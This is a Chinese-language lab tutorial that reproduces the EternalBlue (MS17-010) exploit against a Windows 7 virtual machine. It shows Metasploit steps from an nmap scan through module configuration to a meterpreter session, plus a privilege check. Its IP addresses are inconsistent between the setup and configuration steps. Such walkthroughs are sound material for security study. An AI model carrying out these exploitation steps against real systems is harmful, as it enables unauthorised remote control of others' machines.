环境准备
本次漏洞复现使用虚拟机环境进行:
攻击机:kali IP地址:192.168.3.128
靶机:windows7 64位 IP地址:192.168.3.141
kali开启msfconsole
使用msfconsole命令,当出现msf6 > 说明成功进入msf命令行。
注:若是第一次开启msf,需要输入命令msfdb init 进行msf数据库初始化。

使用msf自带db_nmap进行端口扫描
使用命令:db_nmap -sT 192.168.3.141
扫描目标主机是否开启445端口,是否具有永恒之蓝漏洞。
注:扫描之前需要先关闭win7的防火墙。


使用search命令搜索MS17_010
在msf命令行中使用search命令搜索MS17_010漏洞

使用use命令使用ms17_010_eternalblue模块

使用show options命令查看模块相关配置
yes表示需要进行配置。
配置rhosts选项为192.168.1.141(靶机地址)
配置lhost选项为192.168.1.136(攻击机地址)
配置lport选项为4444(使用任意未被使用的端口)

使用run命令运行模块
当命令行出现meterpreter时,就说明成功控制了win7

使用getuid查看目前账户的权限


本文详细介绍如何在虚拟机环境中利用Kali Linux攻击Windows 7系统上的永恒之蓝漏洞。步骤包括环境搭建、使用Metasploit框架进行端口扫描、漏洞模块配置及成功控制靶机的过程。
1918

被折叠的 条评论
为什么被折叠?



